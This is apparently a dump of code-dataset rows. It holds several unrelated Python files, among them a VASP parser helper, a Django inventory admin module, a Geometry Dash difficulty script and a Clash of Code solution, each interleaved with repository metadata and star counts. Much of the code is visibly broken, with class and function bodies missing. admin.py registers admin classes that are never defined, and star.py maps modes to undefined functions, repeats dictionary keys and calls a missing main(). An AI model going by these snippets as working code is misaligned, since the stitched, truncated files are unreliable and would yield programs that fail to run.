Contains the parsing interfaces to ``parsevasp`` used to parse ``vasprun.xml`` content.
"""
# pylint: disable=abstract-method, too-many-public-methods
import numpy as np
from parsevasp.vasprun import Xml
from parsevasp import constants as parsevaspct
from aiida_vasp.parsers.content_parsers.base import BaseFileParser
from aiida_vasp.utils.compare_bands import get_band_properties
def _build_structure(lattice):
"""Builds a structure according to AiiDA spec."""
structure_dict = {}
structure_dict['unitcell'] = lattice['unitcell']
structure_dict['sites'] = []
# AiiDA wants the species as symbols, so invert
elements = _invert_dict(parsevaspct.elements)
for pos, specie in zip(lattice['positions'], lattice['species']):
site = {}
site['position'] = np.dot(pos, lattice['unitcell'])
site['symbol'] = elements[specie].title()
site['kind_name'] = elements[specie].title()
structure_dict['sites'].append(site)
return structure_dict
def _invert_dict(dct):
return dct.__class__(map(reversed, dct.items()))
| 31.898571 | 132 | 0.578261 |
5fb1b34629d1b25a94935e87aa37911d21e8edb9 | 704 | py | Python | estoque/admin.py | Felipebros/mini_curso_django | 965dd5e8837db9dea4485e889c2b8703fb5e902d | [
"MIT"
] | 8 | 2019-06-18T20:20:39.000Z | 2019-11-09T20:21:06.000Z | estoque/admin.py | Felipebros/mini_curso_django | 965dd5e8837db9dea4485e889c2b8703fb5e902d | [
"MIT"
] | 8 | 2019-12-04T23:26:42.000Z | 2022-02-10T12:02:19.000Z | estoque/admin.py | Felipebros/mini_curso_django | 965dd5e8837db9dea4485e889c2b8703fb5e902d | [
"MIT"
] | 3 | 2019-06-21T22:37:32.000Z | 2019-10-31T00:38:45.000Z | from django.contrib import admin
from .models import Produto, TipoProduto, Estoque
# Register your models here.
admin.site.register(TipoProduto, TipoProdutoAdmin)
admin.site.register(Estoque, EstoqueAdmin)
admin.site.register(Produto, ProdutoAdmin) | 35.2 | 105 | 0.755682 |
5fb1ba21e31a7c2b9e588c895f10ae57243ce651 | 3,137 | py | Python | star/star.py | gd-star-pp/star-pp | 24c7289199215961fe5462b99ec600907b305d3f | [
"MIT"
] | 2 | 2021-10-10T23:42:30.000Z | 2022-03-31T19:43:13.000Z | star/star.py | lotus-gd/azalea | 24c7289199215961fe5462b99ec600907b305d3f | [
"MIT"
] | null | null | null | star/star.py | lotus-gd/azalea | 24c7289199215961fe5462b99ec600907b305d3f | [
"MIT"
] | null | null | null | import gd, itertools
from cube import calculate_cube
from ball import calculate_ball
from helpers import average
client = gd.Client()
modes = {gd.PortalType.CUBE: calculate_cube,
gd.PortalType.SHIP: calculate_ship,
gd.PortalType.BALL: calculate_ball,
gd.PortalType.BALL: calculate_ufo,
gd.PortalType.UFO: calculate_ufo,
gd.PortalType.WAVE: calculate_wave,
gd.PortalType.ROBOT: calculate_robot,
gd.PortalType.SPIDER: calculate_spider,
gd.Gamemode.CUBE: calculate_cube,
gd.Gamemode.SHIP: calculate_ship,
gd.Gamemode.BALL: calculate_ball,
gd.Gamemode.BALL: calculate_ufo,
gd.Gamemode.UFO: calculate_ufo,
gd.Gamemode.WAVE: calculate_wave,
gd.Gamemode.ROBOT: calculate_robot,
gd.Gamemode.SPIDER: calculate_spider}
if __name__ == "__main__":
star = main()
print(star) | 36.057471 | 203 | 0.646159 |
5fb3ccf7fca90c61707cbd90f3475846779b54b9 | 341 | py | Python | clash-of-code/shortest/number_categories.py | jonasnic/codingame | f1a7fe8007b9ca63bdf30cd72f4d6ac41a5ac721 | [
"MIT"
] | 30 | 2016-04-30T01:56:05.000Z | 2022-03-09T22:19:12.000Z | clash-of-code/shortest/number_categories.py | jonasnic/codingame | f1a7fe8007b9ca63bdf30cd72f4d6ac41a5ac721 | [
"MIT"
] | 1 | 2021-05-19T19:36:45.000Z | 2021-05-19T19:36:45.000Z | clash-of-code/shortest/number_categories.py | jonasnic/codingame | f1a7fe8007b9ca63bdf30cd72f4d6ac41a5ac721 | [
"MIT"
] | 17 | 2020-01-28T13:54:06.000Z | 2022-03-26T09:49:27.000Z | from collections import defaultdict
c=defaultdict(set)
f=lambda:[int(i) for i in input().split()]
a,b=f()
s,e=f()
for i in range(s,e+1):
x=i%a==0
y=i%b==0
if x and y:
c[3].add(i)
elif x and not y:
c[1].add(i)
elif y and not x:
c[2].add(i)
else:
c[4].add(i)
o=[]
for i in range(1,5):
o.append(str(len(c[i])))
print(' '.join(o)) | 17.05 | 42 | 0.58651 |
5fb5e0196946388daa9f3a5d9e0cb39eba4f8a0c | 520 | py | Python | interpreter/src/parser/errors.py | Cdayz/simple_lang | dc19d6ef76bb69c87981c8b826cf8f71b0cc475b | [
"MIT"
] | 3 | 2019-08-22T01:20:16.000Z | 2021-02-05T09:11:50.000Z | interpreter/src/parser/errors.py | Cdayz/simple_lang | dc19d6ef76bb69c87981c8b826cf8f71b0cc475b | [
"MIT"
] | null | null | null | interpreter/src/parser/errors.py | Cdayz/simple_lang | dc19d6ef76bb69c87981c8b826cf8f71b0cc475b | [
"MIT"
] | 2 | 2019-08-22T01:20:18.000Z | 2021-05-27T14:40:12.000Z | """Module with useful exceptions for Parser."""
| 22.608696 | 52 | 0.696154 |
5fb78ad70383d16f179dd4a23ab825be06e844e6 | 1,919 | py | Python | apps/DuelingBanditsPureExploration/dashboard/Dashboard.py | erinzm/NEXT-chemistry | d6ca0a80640937b36f9cafb5ead371e7a8677734 | [
"Apache-2.0"
] | 155 | 2015-11-01T17:48:41.000Z | 2022-02-06T21:37:41.000Z | apps/DuelingBanditsPureExploration/dashboard/Dashboard.py | erinzm/NEXT-chemistry | d6ca0a80640937b36f9cafb5ead371e7a8677734 | [
"Apache-2.0"
] | 193 | 2015-09-29T21:40:31.000Z | 2020-04-21T15:09:13.000Z | apps/DuelingBanditsPureExploration/dashboard/Dashboard.py | erinzm/NEXT-chemistry | d6ca0a80640937b36f9cafb5ead371e7a8677734 | [
"Apache-2.0"
] | 54 | 2015-09-30T15:51:05.000Z | 2022-02-13T05:26:20.000Z | import json
import next.utils as utils
from next.apps.AppDashboard import AppDashboard
| 47.975 | 158 | 0.604482 |
5fba9266d157d784d487f4f6d96c252ab58bc927 | 221 | py | Python | modules/module0/02_datastructures_and_geometry/datastructures_0b.py | tetov/ITA19 | 1af68a8885caf83acd98f4136d0286539ccbe63b | [
"MIT"
] | 7 | 2019-11-13T20:29:54.000Z | 2020-02-26T14:30:54.000Z | modules/module0/02_datastructures_and_geometry/datastructures_0b.py | GeneKao/ITA19 | c4b10dc183599eed4ed60d922b6ef5922d173bdb | [
"MIT"
] | 4 | 2019-11-07T20:57:51.000Z | 2020-03-04T11:43:18.000Z | modules/module0/02_datastructures_and_geometry/datastructures_0b.py | GeneKao/ITA19 | c4b10dc183599eed4ed60d922b6ef5922d173bdb | [
"MIT"
] | 6 | 2019-10-30T13:25:54.000Z | 2020-02-14T14:06:09.000Z | import os
import compas
from compas.datastructures import Mesh
HERE = os.path.dirname(__file__)
DATA = os.path.join(HERE, 'data')
FILE = os.path.join(DATA, 'faces.obj')
mesh = Mesh.from_obj(FILE)
print(mesh.summary())
| 18.416667 | 38 | 0.737557 |
5fbebd443ba2cc788cd34ccb4de7f2967a894072 | 3,957 | py | Python | vis_utils/animation/group_animation_controller.py | eherr/vis_utils | b757b01f42e6da02ad62130c3b0e61e9eaa3886f | [
"MIT"
] | 4 | 2020-05-20T03:55:19.000Z | 2020-12-24T06:33:40.000Z | vis_utils/animation/group_animation_controller.py | eherr/vis_utils | b757b01f42e6da02ad62130c3b0e61e9eaa3886f | [
"MIT"
] | 1 | 2020-05-18T11:21:35.000Z | 2020-07-07T21:25:57.000Z | vis_utils/animation/group_animation_controller.py | eherr/vis_utils | b757b01f42e6da02ad62130c3b0e61e9eaa3886f | [
"MIT"
] | 1 | 2020-07-20T06:57:13.000Z | 2020-07-20T06:57:13.000Z | #!/usr/bin/env python
#
# Copyright 2019 DFKI GmbH.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the
# following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
# NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
# USE OR OTHER DEALINGS IN THE SOFTWARE.
from PySignal import Signal
from .animation_controller import AnimationController
from ..scene.components import ComponentBase
| 39.57 | 98 | 0.706849 |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.